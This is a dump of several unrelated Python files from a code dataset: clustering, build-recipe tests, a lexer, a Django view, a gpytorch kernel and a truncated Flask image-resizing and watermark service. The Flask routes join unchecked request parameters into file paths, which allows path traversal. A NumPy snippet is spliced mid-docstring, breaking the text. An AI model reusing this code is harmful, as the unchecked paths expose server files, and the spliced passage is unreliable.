shape=(n_samples, n_features)\n Training instances to cluster.\n\n y : Ignored\n not used, present here for API consistency by convention.\n\n sample_weight : array-like, shape (n_samples,), optional\n The weights for each observation in X. 
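# A standalone worked example (toy numbers, plain NumPy) of the membership
# update computed in fcm() above: u_ij = 1 / sum_k (d_ij / d_ik)**(2/(m-1)),
# so the nearer centroid receives the larger weight and each row of the
# membership matrix sums to one.
import numpy as np

m = 2.0
d = np.array([[1.0, 3.0]])  # one sample, distances to two centroids
u = 1.0 / np.sum((d[:, :, None] / d[:, None, :]) ** (2 / (m - 1)), axis=2)
assert np.allclose(u, [[0.9, 0.1]])      # closer centroid dominates
assert np.allclose(u.sum(axis=1), 1.0)   # memberships stay normalized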
If None, all observations\n are assigned equal weight (default: None)\n\n \"\"\"\n\n random_state = check_random_state(self.random_state)\n self.cluster_centers_, self.labels_, self.n_iter_ = \\\n fcm(\n X,\n n_clusters=self.n_clusters,\n m=self.m,\n eps=self.eps,\n random_state=random_state,\n max_iter=self.max_iter,\n sample_weight=sample_weight\n )\n return self\n\n def fit_predict(self, X, y=None, sample_weight=None):\n \"\"\"Compute cluster centers and predict cluster index for each sample.\n\n Convenience method; equivalent to calling fit(X) followed by\n predict(X).\n\n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, n_features]\n New data to transform.\n\n y : Ignored\n not used, present here for API consistency by convention.\n\n sample_weight : array-like, shape (n_samples,), optional\n The weights for each observation in X. If None, all observations\n are assigned equal weight (default: None)\n\n Returns\n -------\n labels : array, shape [n_samples,]\n Index of the cluster each sample belongs to.\n \"\"\"\n return self.fit(X, sample_weight=sample_weight).labels_\n","sub_path":"sklearn/cluster/fcm.py","file_name":"fcm.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"40986160","text":"# Copyright 2018 The LUCI Authors. All rights reserved.\n# Use of this source code is governed under the Apache License, Version 2.0\n# that can be found in the LICENSE file.\n\nimport json\n\nfrom google.protobuf import text_format\n\nDEPS = [\n 'buildbucket',\n 'properties',\n 'step',\n]\n\n\ndef RunSteps(api):\n text = text_format.MessageToString(api.buildbucket.build)\n api.step('build', ['echo'] + text.splitlines())\n\n\n child_build_tags = [\n '%s:%s' % t\n for t in api.buildbucket.tags_for_child_build.iteritems()\n ]\n api.step('tags_for_child_build', ['echo'] + child_build_tags)\n\n assert api.buildbucket.bucket_v1 == api.properties.get('expected_bucket_v1')\n assert api.buildbucket.builder_name == api.buildbucket.build.builder.builder\n assert api.buildbucket.gitiles_commit == (\n api.buildbucket.build.input.gitiles_commit)\n\n\ndef GenTests(api):\n\n def case(name, **properties):\n return api.test(name) + api.properties(**properties)\n\n def legacy_build(name, **buildbucket_build):\n return case(name, buildbucket={'build': buildbucket_build})\n\n yield case('empty')\n\n yield case('serialized buildbucket property', buildbucket=json.dumps({\n 'build': {'id': '123456789'}\n }))\n\n yield legacy_build('v1 build with id', id='123456789')\n\n yield legacy_build('v1 empty buildset', tags=['buildset:'])\n yield legacy_build('v1 unknown buildset format', tags=['buildset:x'])\n\n yield legacy_build('v1 gerrit change', tags=[\n 'buildset:patch/gerrit/chromium-review.googlesource.com/1/2',\n ])\n\n yield legacy_build('v1 gitiles commit', tags=[\n ('buildset:commit/gitiles/chromium.googlesource.com/chromium/src/+/'\n 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'),\n ])\n yield legacy_build('v1 gitiles commit, invalid', tags=[\n 'buildset:commit/gitiles/a/b/c/d'\n ])\n yield legacy_build(\n 'v1 created_by',\n created_by='user:jane@example.com')\n yield legacy_build(\n 'v1 created_ts',\n created_ts='1546473600000000')\n\n yield case(\n 'buildbot gitiles commit',\n revision='a' * 40,\n branch='master',\n )\n yield case(\n 'buildbot gitiles commit, parent_got_revision',\n parent_got_revision='a' * 40,\n )\n yield case(\n 'buildbot gitiles commit, both revision and 
parent_got_revision',\n revision='a' * 40,\n parent_got_revision='b' * 40,\n )\n yield case(\n 'buildbot gitiles commit, invalid revision',\n revision='deafbeef', # too short\n )\n yield case(\n 'buildbot gitiles commit, HEAD revision',\n revision='HEAD',\n )\n\n yield case(\n 'buildbot gerrit change',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n patch_issue=1,\n patch_set=2,\n buildbucket={\n 'build': {\n 'tags': [\n 'buildset:patch/gerrit/chromium-review.googlesource.com/1/2',\n ],\n },\n },\n )\n yield case(\n 'buildbot gerrit change, patch_gerrit_url without scheme',\n patch_storage='gerrit',\n patch_gerrit_url='example.googlesource.com',\n patch_project='a/b',\n patch_issue=1,\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change, patch_gerrit_url with unexpected scheme',\n patch_storage='gerrit',\n patch_gerrit_url='ftp://example.googlesource.com',\n patch_project='a/b',\n patch_issue=1,\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change with revision',\n revision='a' * 40,\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n patch_issue=1,\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change, issue and patchset properties',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n issue=1,\n patchset=2,\n )\n yield case(\n 'buildbot gerrit change, no project',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_issue=1,\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change, string issue',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n patch_issue='1',\n patch_set=2,\n )\n yield case(\n 'buildbot gerrit change, string issue, not a number',\n patch_storage='gerrit',\n patch_gerrit_url='https://example.googlesource.com/',\n patch_project='a/b',\n patch_issue='x',\n patch_set=2,\n )\n\n yield (\n legacy_build(\n 'v1 luci builder id',\n project='chromium',\n bucket='luci.chromium.try',\n tags=['builder:linux']) +\n api.properties(expected_bucket_v1='luci.chromium.try'))\n\n yield case(\n 'v1 buildbot builder id', mastername='chromium', buildername='linux')\n\n yield legacy_build('v1 tags', tags=['a:b', 'c:d'])\n yield legacy_build('v1 hidden tags', tags=[\n 'buildset:patch/gerrit/chromium-review.googlesource.com/1/2',\n ('buildset:commit/gitiles/chromium.googlesource.com/chromium/src/+/'\n 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'),\n 'build_address:bucket/builder/123',\n 'builder:linux',\n ])\n","sub_path":"recipe_modules/buildbucket/tests/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"449089617","text":"#acronym-JBO.py\r\n#John Bello-Ogunu\r\n#creates an acronym using a function \r\n\r\ndef acronym(word):\r\n thePhrase= \"\"\r\n newWord = word.upper().split()\r\n for ch in newWord:\r\n thePhrase = thePhrase + ch[0]\r\n return thePhrase\r\n\r\n\r\ndef main():\r\n phrase = input(\"Enter a short phrase: \" )\r\n phraseAcronym = acronym(phrase)\r\n print(\"The acronym for '\" + phrase + \"' is \" + phraseAcronym)\r\n#end main()\r\nmain()\r\n","sub_path":"acronym-JBO.py","file_name":"acronym-JBO.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"402536060","text":"from os import 
error\nfrom ply import *\n\nfrom reportes.error import *\nfrom Instrucciones.Excepcion import Excepcion\n\n\n# Construyendo el analizador léxico y sintactico\n\n# definicion del analizador lexico\n\n# NOMBRE QUE IDENTIFICA A CADA TOKEN\n\nlista_errores_lexico=[]\nglobal columna\ncolumna=0\n\nreservadas2 = (\n 'from',\n 'import',\n 'as',\n 'global',\n 'None',\n 'def',\n 'print',\n 'ejecutar_analisis',\n 'for',\n 'in',\n 'ejecutar',\n 'with_goto',\n 'main',\n 'if',\n 'label',\n 'goto',\n 'return',\n 'true',\n 'false'\n)\n\ntokens = reservadas2 + (\n # OPERADORES COMPARADORES\n 'IGUAL', 'BLANCO',\n 'MAYORQ',\n 'MENORQ',\n 'MAYOR_IGUALQ',\n 'MENOR_IGUALQ',\n 'DISTINTO',\n 'PARIZQ',\n 'PARDER',\n 'CORIZQ',\n 'CORDER',\n 'LLAVEIZQ',\n 'LLAVEDER',\n 'MAS',\n 'MENOS',\n 'POR',\n 'DIVIDIDO',\n 'EXPONENCIACION',\n 'MODULO',\n 'ENTERO',\n 'PUNTO',\n 'FDECIMAL',\n 'COMA',\n 'ID',\n 'CADENA',\n 'CADENA2',\n 'CARACTER',\n 'COMENTARIO_MULTILINEA',\n 'COMENTARIO_SIMPLE',\n 'ARROBA',\n 'DOS_PUNTOS',\n 'NAME',\n 'COMILLAS'\n)\n\n# EXPRESIONES REGULARES BASICAS\nt_ARROBA = r'@'\nt_PARIZQ = r'\\('\nt_PARDER = r'\\)'\nt_CORIZQ = r'\\['\nt_CORDER = r'\\]'\nt_LLAVEIZQ = r'\\{'\nt_LLAVEDER = r'\\}'\nt_COMA = r','\nt_PUNTO = r'\\.'\n# OPERADORES ARITMETICOS\nt_MAS = r'\\+'\nt_MENOS = r'-'\nt_POR = r'\\*'\nt_DIVIDIDO = r'/'\nt_EXPONENCIACION = r'\\^'\nt_MODULO = r'%'\n# OPERADORES RELACIONALES\nt_DISTINTO = r'\\<\\>'\nt_IGUAL = r'\\='\nt_MAYORQ = r'\\>'\nt_MENORQ = r'\\<'\nt_MAYOR_IGUALQ = r'\\>\\='\nt_MENOR_IGUALQ = r'\\<\\='\nt_DOS_PUNTOS = r':'\nt_NAME = r\"__name__\"\nt_COMILLAS = r'\\\"' \n# SEGUNDA FASE\n#t_DOS_PUNTOS_IGUAL = r':\\='\n\n\n\n# EXPRESIONES REGULARES CON ESTADOS\n\n# OPERADORES RELACIONALES\n# 'INNER', 'JOIN','LEFT','RIGHT','FULL', 'OUTER','ON'\n\n\ndef t_CADENA(t):\n r'\\\".*?\\\"'\n t.value = t.value[1:-1] # remuevo las comillas dobles\n return t\n\n\ndef t_CADENA2(t):\n r'\\\"__.*?__\\\"'\n t.value = t.value[1:-1] # remuevo las comillas dobles\n return t\n\n\ndef t_CARACTER(t):\n r'\\'.*?\\''\n t.value = t.value[1:-1] # remuevo las comillas simples\n #print('esto es un caracter: ', t.value)\n return t\n\n\ndef t_FDECIMAL(t):\n r'\\d+\\.\\d+'\n try:\n t.value = float(t.value)\n except ValueError:\n print(\"Float value too large %d\", t.value)\n t.value = 0\n return t\n\n\ndef t_ID(t):\n r'[a-zA-Z][a-zA-Z_0-9_]*'\n\n #print(t.value.upper())\n\n if (t.value) in reservadas2:\n #print(\"esto es una palabra reservada: \" + t.value)\n \n #print(\"llego aqui\")\n #t.value= t.value.upper()\n #t.type = t.value.upper()\n t.type = t.value\n #print(t.type)\n else:\n #print(t.value)\n t.type = 'ID'\n \n return t\n\n\ndef t_ENTERO(t):\n r'\\d+'\n try:\n t.value = int(t.value)\n #print(t.value)\n #print(t.type)\n except ValueError:\n print(\"Integer value too large %d\", t.value)\n t.value = 0\n return t\n\n\ndef t_COMENTARIO_MULTILINEA(t):\n r'/\\'\\'\\'(.|\\n)*?\\'\\'\\''\n t.lexer.lineno += t.value.count('\\n')\n\n\n# Comentario simple // ...\ndef t_COMENTARIO_SIMPLE(t):\n r'#.*\\n'\n t.lexer.lineno += 1\n\n\ndef t_BLANCO(t):\n r' |\\t'\n\n\n\ndef t_NEWLINE(t):\n r'\\n+'\n #t.lexer.lineno += t.value.count(\"\\n\")\n t.lexer.lineno += len(t.value)\n global columna\n columna = lexer.lexpos\n\ndef columas(args):\n valor = lexer.lexpos-args\n return valor\n\n# Caracteres ignorados\nt_ignore = \"\\r\"\n\n\ndef t_error(t):\n global columna\n #print(\"Illegal character '%s'\" % t.value[0])\n #print(t.value)\n #print(\"fila \", t.lexer.lineno)\n #print(\"Columna \", columas(columna))\n col = columas(columna)\n 
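    # PLY tracks only lexpos, not columns: t_NEWLINE above stores the
    # lexpos reached at the last newline in the module-global `columna`,
    # and columas() derives the column as `lexer.lexpos - columna`. The
    # resulting (line, col) pair is attached to the lexical-error record
    # below.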
dato = Excepcion(0,\"Error Lexico\", f\"El Simbolo << {t.value[0]} >> No Pertenece al Lenguaje\", t.lexer.lineno, col)\n lista_errores_lexico.append(dato)\n t.lexer.skip(1)\n\n\nimport re\n\nprint(\"---------------------------------------\")\nlexer = lex.lex(reflags=re.IGNORECASE)\n\n","sub_path":"parser/fase2/team08/Tytus_SQLPARSER_G8/optimizacion/lexicoC3D.py","file_name":"lexicoC3D.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"540317350","text":"import logging\n\nfrom django.shortcuts import render\nfrom querystring_parser import parser\n\nfrom about.models import OfficerEmailListAndPositionMapping, Term, Officer\nfrom about.views.officer_position_and_github_mapping.officer_management_helper import TAB_STRING\nfrom about.views.position_mapping_helper import update_context, OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID, \\\n OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_INDEX, \\\n OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_NAME, \\\n OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__EMAIL_LIST_ADDRESS, \\\n OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ELECTION_POSITION\nfrom csss.views.request_validation import verify_access_logged_user_and_create_context\nfrom csss.views_helper import ERROR_MESSAGE_KEY, ERROR_MESSAGES_KEY, \\\n get_current_term, get_datetime_for_beginning_of_current_term\nfrom elections.models import NomineePosition\n\nDELETE_POSITION_MAPPING_KEY = 'delete_position_mapping'\nUN_DELETED_POSITION_MAPPING_KEY = 'un_delete_position_mapping'\nUPDATE_POSITION_MAPPING_KEY = 'update_position_mapping'\n\nlogger = logging.getLogger('csss_site')\n\n\ndef update_saved_position_mappings(request):\n (render_value, error_message, context) = verify_access_logged_user_and_create_context(request,\n TAB_STRING)\n if context is None:\n request.session[ERROR_MESSAGE_KEY] = f'{error_message}
'\n return render_value\n\n if request.method == \"POST\":\n context[ERROR_MESSAGES_KEY] = _update_positions_mapping(\n list(\n parser.parse(\n request.POST.urlencode()\n )['saved_officer_positions'].values()\n )\n )\n return render(request, 'about/position_mapping/position_mapping.html', update_context(context))\n\n\ndef _update_positions_mapping(positions):\n \"\"\"\n Updates the position mapping for the specified position\n\n Keyword Argument\n position -- the dict for a specific position\n\n Return\n error_messages -- a list of all the possible error messages\n \"\"\"\n current_specified_position_names = []\n current_specified_position_indices = []\n positions_to_save = []\n nominees_to_save = []\n for position in positions:\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID in position\n and f\"{position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID]}\".isdigit()\n and len(\n OfficerEmailListAndPositionMapping.objects.all().filter(\n id=int(position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID])\n )\n ) > 0):\n error_message = \"No valid position mapping id detected\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_INDEX in position\n and f\"{position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_INDEX]}\".isdigit()):\n error_message = \"No valid position index detected for position mapping\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_NAME in position):\n error_message = \"No valid position name detected for position mapping\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__EMAIL_LIST_ADDRESS in position):\n error_message = \"No valid position email list detected for position mapping\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n if not (OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ELECTION_POSITION in position):\n error_message = \"No valid position elected status detected for position mapping\"\n logger.info(f\"[about/update_saved_position_mappings.py _update_position_mapping()] {error_message}\")\n return [error_message]\n\n position_mapping_for_selected_officer = OfficerEmailListAndPositionMapping.objects.get(\n id=int(position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ID])\n )\n logger.info(\n f\"[about/update_saved_position_mappings.py _update_position_mapping()] \"\n f\"user has selected to update the position {position_mapping_for_selected_officer.position_name}\"\n )\n\n new_position_index_for_officer_position = int(\n position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_INDEX]\n )\n new_name_for_officer_position = position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__POSITION_NAME]\n new_sfu_email_list_address_for_officer_position = \\\n position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__EMAIL_LIST_ADDRESS]\n elected_via_election_officer = \\\n position[OFFICER_EMAIL_LIST_AND_POSITION_MAPPING__ELECTION_POSITION]\n\n if officer_info_is_not_changed(position_mapping_for_selected_officer, new_name_for_officer_position,\n new_position_index_for_officer_position,\n new_sfu_email_list_address_for_officer_position,\n elected_via_election_officer):\n continue\n logger.info(\n 
f\"[about/update_saved_position_mappings.py _update_position_mapping()] the user's \"\n f\"change to the position {position_mapping_for_selected_officer.position_name} was detected\"\n )\n # if anything has been changed for the selected position\n success = True\n error_message = None\n previous_position_index = position_mapping_for_selected_officer.position_index\n previous_position_name = position_mapping_for_selected_officer.position_name\n if new_position_index_for_officer_position != previous_position_index:\n if new_position_index_for_officer_position in current_specified_position_indices:\n error_message = f\"more than one position have been assigned an index of \" \\\n f\"{new_position_index_for_officer_position}\"\n success = False\n else:\n current_specified_position_indices.append(new_position_index_for_officer_position)\n if success and new_name_for_officer_position != previous_position_name:\n if new_name_for_officer_position in current_specified_position_names:\n f\"more than one position have been set to the name of {new_name_for_officer_position}\"\n success = False\n else:\n current_specified_position_names.append(new_name_for_officer_position)\n\n if success:\n update_current_officer(positions_to_save, position_mapping_for_selected_officer,\n new_position_index_for_officer_position,\n new_sfu_email_list_address_for_officer_position, new_name_for_officer_position)\n update_elections_in_current_term(nominees_to_save, position_mapping_for_selected_officer,\n new_position_index_for_officer_position,\n new_name_for_officer_position\n )\n position_mapping_for_selected_officer.position_name = new_name_for_officer_position\n position_mapping_for_selected_officer.position_index = new_position_index_for_officer_position\n position_mapping_for_selected_officer.email = new_sfu_email_list_address_for_officer_position\n position_mapping_for_selected_officer.elected_via_election_officer = elected_via_election_officer\n position_mapping_for_selected_officer.save()\n else:\n logger.info(\n \"[about/update_saved_position_mappings.py _update_position_mapping()]\"\n f\" encountered error {error_message} when trying to update position\"\n f\" {position_mapping_for_selected_officer.position_name}\"\n )\n if error_message is not None:\n return [error_message]\n [position_to_save.save() for position_to_save in positions_to_save]\n [nominee_to_save.save() for nominee_to_save in nominees_to_save]\n return []\n\n\ndef officer_info_is_not_changed(position_mapping_for_selected_officer, new_name_for_officer_position,\n new_position_index_for_officer_position,\n new_sfu_email_list_address_for_officer_position,\n elected_via_election_officer):\n \"\"\"\n Returns a bool that indicates if the officer's info has been changed\n\n Keyword Arguments\n position_mapping_for_selected_officer -- the position mapping object for the officer position that may need\n to be updated\n new_name_for_officer_position -- the new name for the position mapping that may need to be updated\n new_position_index_for_officer_position -- the new index for the position mapping that may need to be updated\n new_sfu_email_list_address_for_officer_position -- the new sfu email list address for the position mapping\n that may need to be updated\n elected_via_election_officer -- the new status of whether a position is elected via election officer for\n the position mapping that may need to be updated\n\n Return\n bool -- true if a position_mapping_for_selected_officer has to be updated\n \"\"\"\n return new_name_for_officer_position == 
position_mapping_for_selected_officer.position_name \\\n and new_position_index_for_officer_position == position_mapping_for_selected_officer.position_index \\\n and new_sfu_email_list_address_for_officer_position == position_mapping_for_selected_officer.email \\\n and elected_via_election_officer == position_mapping_for_selected_officer.elected_via_election_officer\n\n\ndef update_current_officer(positions_to_save, position_mapping_for_selected_officer,\n new_position_index_for_officer_position,\n new_sfu_email_list_address_for_officer_position, new_name_for_officer_position):\n \"\"\"\n updating the officer object under the current term with the new position mapping info\n\n Keyword Argument\n positions_to_save -- the list that has to contain all the officer objects that have to be added to for changes\n to be saved to DB\n position_mapping_for_selected_officer -- the position mapping object for the position that has to be updated\n new_name_for_officer_position -- the new name for the officer position that need to be updated\n new_position_index_for_officer_position -- the new index for the officer position that need to be updated\n new_sfu_email_list_address_for_officer_position -- the new sfu email list address for the officer position\n that need to be updated\n \"\"\"\n terms = Term.objects.all().filter(term_number=get_current_term())\n if len(terms) == 1:\n term = terms[0]\n officers_in_current_term_that_need_update = Officer.objects.all().filter(\n elected_term=term,\n position_index=position_mapping_for_selected_officer.position_index\n )\n logger.info(\n f\"[about/update_saved_position_mappings.py _update_position_mapping()] updating\"\n f\" {len(officers_in_current_term_that_need_update)} officers due to change in position\"\n f\" {position_mapping_for_selected_officer.position_name}\"\n )\n for officer_in_current_term_that_need_update in officers_in_current_term_that_need_update:\n officer_in_current_term_that_need_update.position_index = new_position_index_for_officer_position\n officer_in_current_term_that_need_update.sfu_officer_mailing_list_email = \\\n new_sfu_email_list_address_for_officer_position\n officer_in_current_term_that_need_update.position_name = new_name_for_officer_position\n positions_to_save.append(officer_in_current_term_that_need_update)\n\n\ndef update_elections_in_current_term(nominees_to_save, position_mapping_for_selected_officer,\n new_position_index_for_officer_position,\n new_name_for_officer_position):\n \"\"\"\n Updating the nominee objects for nominees that have run for a position that needs to be updated\n in the current term\n\n Keyword Argument\n nominees_to_save -- the list that has to contain all the officer objects that have to be added to for changes\n to be saved to DB\n position_mapping_for_selected_officer -- the position mapping object for the position that has to be updated\n new_name_for_officer_position -- the new name for the nominee positions that need to be updated\n new_position_index_for_officer_position -- the new index for the nominee positions that need to be updated\n \"\"\"\n nominees_to_update = NomineePosition.objects.all().filter(\n position_index=position_mapping_for_selected_officer.position_index,\n nominee_speech__nominee__election__date__gte=get_datetime_for_beginning_of_current_term()\n )\n for nominee_to_update in nominees_to_update:\n nominee_to_update.position_name = new_name_for_officer_position\n nominee_to_update.position_index = new_position_index_for_officer_position\n 
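            # deferred write: the nominee is only queued here; the caller
            # (_update_positions_mapping) saves the queued officers and
            # nominees in bulk after every submitted position validates,
            # so a validation error leaves the database untouched.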
nominees_to_save.append(nominee_to_update)\n","sub_path":"csss-site/src/about/views/officer_position_and_github_mapping/update_saved_position_mappings.py","file_name":"update_saved_position_mappings.py","file_ext":"py","file_size_in_byte":13732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312965569","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport torch\nfrom gpytorch.kernels import Kernel\nfrom gpytorch.lazy import MatmulLazyVariable, RootLazyVariable\nfrom gpytorch.priors._compatibility import _bounds_to_prior\n\n\nclass LinearKernel(Kernel):\n \"\"\"\n An implementation of the linear kernel :math:`k(x, z) =(x-offset)(z-offset)' + variance`.\n\n To implement this efficiently, we use a :obj:`gpytorch.lazy.RootLazyVariable` during training and a\n :math:`gpytorch.lazy.MatmulLazyVariable` during test. These lazy variables represent matrices of the form\n :math:`K = XX^{\\top}` and :math:`K = XZ^{\\top}`. This makes inference efficient because a matrix-vector product\n :math:`Kv` can be computed as :math:`Kv=X(X^{\\top}v)`, where the base multiply :math:`Xv` takes only :math:`O(nd)`\n time and space.\n \"\"\"\n\n def __init__(\n self,\n num_dimensions,\n variance_prior=None,\n offset_prior=None,\n active_dims=None,\n variance_bounds=None,\n offset_bounds=None,\n ):\n \"\"\"\n Args:\n num_dimensions (int): Number of data dimensions to expect. This is necessary to create the offset parameter.\n variance_prior (:obj:`gpytorch.priors.Prior`): Prior over the variance parameter (default `None`).\n offset_prior (:obj:`gpytorch.priors.Prior`): Prior over the offset parameter (default `None`).\n active_dims (list): List of data dimensions to operate on. `len(active_dims)` should equal `num_dimensions`.\n variance_bounds (tuple, deprecated): Min and max value for the variance parameter. Deprecated, and now\n creates a :obj:`gpytorch.priors.SmoothedBoxPrior`.\n offset_bounds (tuple, deprecated): Min and max value for the offset parameter. 
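# A standalone check (toy shapes, plain torch rather than the gpytorch
# lazy-variable API) of the efficiency claim in the class docstring:
# K v = (X X^T) v can be evaluated as X (X^T v), which never forms the
# n x n matrix and costs O(nd) per product.
import torch

n, d = 5, 3
X = torch.randn(n, d)
v = torch.randn(n)
kv_dense = (X @ X.t()) @ v   # materializes the n x n Gram matrix
kv_lazy = X @ (X.t() @ v)    # matrix-free: two thin matrix-vector products
assert torch.allclose(kv_dense, kv_lazy, atol=1e-5)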
Deprecated, and now creates a\n :obj:'gpytorch.priors.SmoothedBoxPrior'.\n \"\"\"\n super(LinearKernel, self).__init__(active_dims=active_dims)\n variance_prior = _bounds_to_prior(prior=variance_prior, bounds=variance_bounds, log_transform=False)\n self.register_parameter(name=\"variance\", parameter=torch.nn.Parameter(torch.zeros(1)), prior=variance_prior)\n offset_prior = _bounds_to_prior(prior=offset_prior, bounds=offset_bounds, log_transform=False)\n self.register_parameter(\n name=\"offset\", parameter=torch.nn.Parameter(torch.zeros(1, 1, num_dimensions)), prior=offset_prior\n )\n\n def forward(self, x1, x2):\n if x1.size() == x2.size() and torch.equal(x1, x2):\n # Use RootLazyVariable when x1 == x2 for efficiency when composing\n # with other kernels\n prod = RootLazyVariable(x1 - self.offset)\n else:\n prod = MatmulLazyVariable(x1 - self.offset, (x2 - self.offset).transpose(2, 1))\n\n return prod + self.variance.expand(prod.size())\n","sub_path":"gpytorch/kernels/linear_kernel.py","file_name":"linear_kernel.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204847007","text":"from flask import Flask, Response, send_file, render_template, request, redirect\nfrom PIL import Image\nfrom datetime import datetime\nimport os \nCURRENT_DIRECTORY = os.getcwd()\napp = Flask(__name__)\ndef resize_image(img, width=None, height=None):\n if width and height:\n img_resize = img.resize((width, height))\n else:\n original_width, original_height = img.size \n img_resize = img.resize(__resize_factory(original_width, original_height, width,height))\n return img_resize\n\ndef __resize_factory(original_width, original_height,width,height): \n if width:\n percent_change = (width*100)/original_width\n new_height = int(original_height*(percent_change/100))\n return (width, new_height)\n elif height:\n percent_change = (height*100)/original_height\n new_width = int(original_width*(percent_change/100))\n return (new_width, height)\n\ndef trans_paste(fg_img, bg_img, alpha=1.0, box=(0,0)):\n fg_img_trans = Image.new(\"RGBA\",fg_img.size)\n fg_img_trans = Image.blend(fg_img_trans,fg_img,alpha)\n bg_img.paste(fg_img_trans,box,fg_img_trans)\n return bg_img\n\n@app.route(\"/\")\ndef index():\n return render_template('docs/index.html')\n\n@app.route(\"/upload-image/\", methods=['GET', 'POST'])\ndef upload_image():\n context = dict()\n if (request.method=='POST'):\n now = datetime.now()\n timestamp = datetime.timestamp(now)\n context['msg'] = \"imagem Enviada!\"\n file = request.files['image']\n names = file.filename.split('.')\n file.save(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', '{}.{}'.format(int(timestamp), names[1])))\n return render_template('docs/upload-image.html', **context)\n\n@app.route(\"/upload-logo/\", methods=['GET', 'POST'])\ndef upload_logo():\n context = dict()\n if (request.method=='POST'):\n now = datetime.now()\n timestamp = datetime.timestamp(now)\n context['msg'] = \"imagem Enviada!\"\n context['class'] = \"success\"\n file = request.files['image']\n names = file.filename.split('.')\n if names[1] in ['png', 'PNG']:\n file.save(os.path.join(CURRENT_DIRECTORY, 'uploads', 'marcas', '{}.{}'.format(int(timestamp), names[1])))\n else:\n context['msg'] = \"A imagem deve permitir transparecencia [PNG]\"\n context['class'] = \"danger\"\n\n return render_template('docs/upload-logo.html', **context)\n\n@app.route(\"/get-images/\")\ndef get_form_images():\n images = 
os.listdir(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens'))\n    marcas = os.listdir(os.path.join(CURRENT_DIRECTORY, 'uploads', 'marcas'))\n\n    return render_template('docs/get-images.html', imagens=images, magua=marcas)\n\n@app.route(\"/image/\", methods=['GET', ])\ndef image():\n    image = request.args.get('image')\n    width = request.args.get('width', default=0, type=int)\n    height = request.args.get('height', default=0, type=int)\n    marca = request.args.get('marca')\n    filename = image.split('.')\n\n    if width or height:\n        new_name = __new_image_name_factory(filename[0],filename[1],width,height)\n    else:\n        new_name = image\n\n    if not os.path.isfile(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name)):\n        img = Image.open(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', image))\n        img_resize = resize_image(img, width=width, height=height)\n        img_resize.save(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name), optimize=True) \n    \n    if marca:\n        new_image = Image.open(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name))\n        marca_image = Image.open(os.path.join(CURRENT_DIRECTORY, 'uploads', 'marcas', marca))\n        width_of_marca = int(new_image.width*(25/100))\n        marca_new_image = resize_image(marca_image, width=width_of_marca)\n        new_image = trans_paste(marca_new_image, new_image, 0.5, (100,100))\n        new_image = new_image.convert(\"RGB\")\n        new_image.save(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name), optimize=True) \n\n    return send_file(os.path.join(CURRENT_DIRECTORY, 'uploads', 'imagens', new_name), mimetype='image/jpeg')\n\ndef __new_image_name_factory(name,file_extension,width,height):\n    if width and height:\n        new_name = \"{}_{}_{}.{}\".format(name,height,width,file_extension)\n    elif width:\n        new_name = \"{}_w{}.{}\".format(name,width,file_extension)\n    